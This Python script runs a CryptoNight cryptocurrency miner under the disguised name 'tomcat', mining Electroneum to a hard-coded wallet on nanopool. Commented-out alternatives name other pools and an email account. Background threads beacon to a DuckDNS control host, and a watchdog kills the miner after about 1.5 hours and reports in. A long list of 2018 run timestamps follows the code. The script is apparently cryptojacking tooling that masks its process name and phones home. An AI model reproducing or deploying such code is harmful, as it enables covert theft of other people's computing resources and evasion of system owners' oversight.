import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:07.860204
#2018-02-17 16:58:03.587543
#2018-02-17 18:46:07.914303
#2018-02-17 20:35:06.148260
#2018-02-17 22:21:02.056217
#2018-02-18 00:05:03.916309
#2018-02-18 01:56:04.245046
#2018-02-18 03:44:06.145058
#2018-02-18 05:31:07.023811
#2018-02-18 07:23:03.614762
#2018-02-18 09:11:06.212210
#2018-02-18 10:57:06.651464
#2018-02-18 12:44:06.990297
#2018-02-18 14:32:07.507708
#2018-02-18 16:22:05.165721
#2018-02-18 18:11:03.989548
#2018-02-18 19:57:01.660400
#2018-02-18 21:43:05.042320
#2018-02-18 23:32:04.917238
#2018-02-19 01:18:05.490317
#2018-02-19 03:06:06.723173
#2018-02-19 04:51:06.521348
#2018-02-19 06:37:07.763544
#2018-02-19 08:28:01.639307
#2018-02-19 10:17:07.297538
#2018-02-19 12:04:06.317069
#2018-02-19 13:51:07.345817
#2018-02-19 15:41:06.390083
#2018-02-19 17:27:08.351674
#2018-02-19 19:16:05.947739
#2018-02-19 21:03:08.501232
#2018-02-19 22:49:06.627961
#2018-02-20 00:34:01.411774
#2018-02-20 02:22:01.560083
#2018-02-20 04:12:05.954729
#2018-02-20 05:55:04.518075
#2018-02-20 07:41:01.725129
#2018-02-20 09:25:08.557663
#2018-02-20 11:09:07.417524
#2018-02-20 12:55:01.780093
#2018-02-20 14:39:05.994694
#2018-02-20 16:23:09.697437
#2018-02-20 18:09:09.363865
#2018-02-20 20:01:04.339078
#2018-02-20 21:48:03.910347
#2018-02-20 23:31:07.349614
#2018-02-21 01:16:06.955346
#2018-02-21 03:03:01.571127
#2018-02-21 04:50:08.383242
#2018-02-21 06:38:07.241395
#2018-02-21 08:24:07.521008
#2018-02-21 10:09:08.729047
#2018-02-21 11:58:08.979498
#2018-02-21 13:47:04.449354
#2018-02-21 15:29:08.084815
#2018-02-21 17:19:06.689549
#2018-02-21 19:08:01.333092
#2018-02-21 20:55:08.020519
#2018-02-21 22:41:07.201637
#2018-02-22 00:29:07.600917
#2018-02-22 02:17:05.835280
#2018-02-22 04:03:06.812659
#2018-02-22 05:49:02.039908
#2018-02-22 07:36:07.976623
#2018-02-22 09:24:07.451887
#2018-02-22 11:10:04.626354
#2018-02-22 12:57:02.012545
#2018-02-22 14:45:09.199742
#2018-02-22 16:29:06.624085
#2018-02-22 18:15:06.822472
#2018-02-22 20:04:01.916028
#2018-02-22 21:53:05.547239
#2018-02-22 23:41:06.067246
#2018-02-23 01:28:06.861229
#2018-02-23 03:14:07.053117
#2018-02-23 05:02:07.804800
#2018-02-23 06:47:04.532409
#2018-02-23 08:34:06.960989
#2018-02-23 10:47:03.720980
#2018-02-23 12:43:01.860212
#2018-02-23 14:27:05.851966
#2018-02-23 16:19:05.950228
#2018-02-23 18:06:01.796967
#2018-02-23 19:50:05.526048
#2018-02-23 21:35:06.058472
#2018-02-23 23:23:02.158772
#2018-02-24 01:14:07.696338
#2018-02-24 03:06:05.115349
#2018-02-24 04:52:03.021688
#2018-02-24 06:38:01.548291
#2018-02-24 08:27:03.406680
#2018-02-24 10:13:01.632342
#2018-02-24 12:07:03.944745
#2018-02-24 13:55:06.667004
#2018-02-24 15:47:06.185066
#2018-02-24 17:37:04.813882
#2018-02-24 19:23:03.696791
#2018-02-24 21:14:01.560955
#2018-02-24 23:50:07.481943
#2018-02-25 03:09:01.588083
#2018-02-25 06:48:05.757002